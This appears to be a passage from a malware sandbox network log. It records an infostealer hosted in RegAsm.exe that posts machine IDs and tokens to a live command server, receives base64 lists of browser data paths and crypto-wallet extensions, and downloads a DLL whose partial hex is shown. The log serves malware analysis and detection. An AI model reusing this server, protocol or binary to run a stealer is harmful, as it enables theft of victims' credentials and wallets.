2024-03-28 08:15:26 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 38 38 30 30 32 35 30 43 35 33 35 32 38 30 30 33 31 39 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="hwid"18E8800250C53528003197-a33c7340-61ca-11ee-8c18-806e6f6e6963------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------
2024-03-28 08:15:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:26 UTC	67	IN	Data Raw: 33 38 0d 0a 31 7c 30 7c 31 7c 31 7c 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 7c 31 7c 30 7c 31 7c 31 7c 31 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 381\|0\|1\|1\|373946e9ddf91fb30c25c9b377555812\|1\|0\|1\|1\|1\|500000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49812	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:27 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------HJJECBKKECFIEBGCAKJKCont
2024-03-28 08:15:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:28 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49813	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:29 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------EGIJEBGDAFHIJJKEHCAACont
2024-03-28 08:15:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:30 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49822	78.46.229.36	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:33 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 7577 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:33 UTC	7577	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------GIEHJDHCBAEHJJJKKFIDCont
2024-03-28 08:15:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49825	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:33 UTC	226	OUT	GET /sqlm.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:34 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:34 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT Connection: close ETag: "66014983-258600" Accept-Ranges: bytes
2024-03-28 08:15:34 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-03-28 08:15:34 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49828	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:36 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:36 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------DHIJDHIDBGHJKECBFIIDCont
2024-03-28 08:15:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49830	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

